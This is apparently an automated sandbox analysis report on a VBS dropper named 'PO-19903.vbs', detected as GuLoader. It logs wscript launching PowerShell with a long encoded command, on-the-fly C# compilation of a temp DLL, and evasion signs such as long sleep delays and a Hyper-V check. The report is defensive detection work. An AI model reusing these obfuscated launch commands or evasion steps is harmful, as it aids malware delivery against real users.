    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220512Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\OVER.datJump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winVBS@8/9@0/0
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.pdb source: powershell.exe, 00000012.00000002.801305815.0000000004CD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.801562069.0000000004EB4000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FA2F52 push FFFFFF8Bh; iretd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FA12A1 push es; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1083
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 838
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: powershell.exe, 00000012.00000002.800533822.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000012.00000002.800533822.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra Skan
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra Skan
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand 